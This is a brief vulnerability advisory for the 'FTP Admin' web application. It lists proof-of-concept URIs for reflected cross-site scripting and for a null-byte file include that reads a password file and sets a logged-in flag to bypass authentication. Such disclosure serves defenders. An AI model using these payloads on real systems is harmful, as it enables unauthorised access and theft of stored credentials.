FTP Admin Multiple Remote Vulnerabilities

FTP Admin Multiple Remote Vulnerabilities

An attacker can exploit these issues via a browser.

The following proof-of-concept URIs are available for the cross-site scripting issue:

http://www.example.com/ft/index.php?page=error&error=<b>...</b>
http://www.example.com/ft/index.php?page=error&error=<script>alert(1)</script>

The following proof-of-concept URI is available for the file-include issue:

http://www.example.com/ft/index.php?page=pass.txt%00&loggedin=true